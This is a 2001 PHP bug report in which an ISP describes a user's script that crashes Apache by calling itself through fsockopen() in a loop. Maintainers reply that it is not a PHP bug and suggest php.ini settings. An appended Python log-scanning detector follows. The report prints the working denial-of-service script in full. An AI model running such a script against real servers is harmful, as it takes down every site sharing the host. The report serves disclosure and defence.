ID: 14372
Updated by: rasmus
Reported By: [EMAIL PROTECTED]
Status: Bogus
Bug Type: Apache related
Operating System: FreeBSD 4.4-Stable
PHP Version: 4.0.6
New Comment:
Just to add to this. The way to fix it at the ISP level is to simply put
"disable_functions = fsockopen" in your php.ini file. Also make sure you turn off
"allow_url_fopen" since this feature can also be used to do something like this.
Previous Comments:
------------------------------------------------------------------------
[2001-12-07 03:18:28] [EMAIL PROTECTED]
You just can't fix this issue without prohibiting calls to fsockopen().
Think again yourself: how can this be fixed? You can disallow http open_wrappers for
sure. The real fix is to remove the user.
There's no bug and nothing to fix -> Bogus.
------------------------------------------------------------------------
[2001-12-07 02:33:08] [EMAIL PROTECTED]
We have had users on our system using their PHP scripts to take down our Apache
servers. The script uses fsockopen() to call the page that issues the fsockopen()
function. When the script calls itself the server gets into a loop of death, spawning
as many connections as httpd.conf will allow. Any incoming connections from then on
just hang and all the websites hosted on that machine are down. Here is a script
that uses this problem to attack Apache.
<?php
$fp = fsockopen ($HTTP_HOST, $SERVER_PORT, $errno, $errstr, 30);
if (!$fp)
{
    echo "$errstr ($errno)<br>\n";
}
else
{
    fputs ($fp, "GET $REQUEST_URI HTTP/1.0\r\nHost: $HTTP_HOST\r\n\r\n");
    while (!feof($fp))
    {
        echo fgets ($fp,128);
    }
    fclose ($fp);
}
?>
Please fix this. We really had a hard time finding the person responsible for doing
this. They had the script in their home "public_html" directory and the only clue we
had was that in the Apache logs it was always the last page accessed before the server
freaked out and spawned over 150 Apache processes.
Thanks,
pHil Cogbill
3iem.net
------------------------------------------------------------------------
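The reporter's only clue was the Apache access log. As an added example (not part of the bug report and not PHP project code), this Python function flags paths that the server requested from itself in a burst. It assumes common log format and that self-originated requests are logged with one of the server's own addresses as the client; the addresses, path and log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common log format prefix: host ident user [time] "METHOD uri proto"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*"')

# Constructed sample: 192.0.2.10 stands in for the web server's own address.
SAMPLE_LOG = [
    f'192.0.2.10 - - [07/Dec/2001:02:30:{s:02d} -0800] "GET /~user1/loop.php HTTP/1.0" 200 512'
    for s in range(1, 7)
] + [
    '198.51.100.7 - - [07/Dec/2001:02:29:58 -0800] "GET /~user1/loop.php HTTP/1.0" 200 512',
    '127.0.0.1 - - [07/Dec/2001:02:30:02 -0800] "GET /server-status HTTP/1.0" 200 900',
    '198.51.100.9 - - [07/Dec/2001:02:30:03 -0800] "GET /index.html HTTP/1.0" 200 2048',
]

def find_self_request_loops(lines, local_addrs, threshold=5, window=timedelta(seconds=10)):
    """Return {path: peak} for paths requested from the server's own addresses
    at least `threshold` times within any `window`-long interval."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group(1) not in local_addrs:
            continue  # unparsable line or an ordinary external client
        ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
        hits[m.group(4).split("?", 1)[0]].append(ts)  # group by path, ignore query
    suspects = {}
    for path, times in hits.items():
        times.sort()
        start = peak = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            suspects[path] = peak
    return suspects

if __name__ == "__main__":
    print(find_self_request_loops(SAMPLE_LOG, {"192.0.2.10", "127.0.0.1"}))
```

`local_addrs` must list every address the host can use as a source when connecting to itself, otherwise self-originated requests are treated as external.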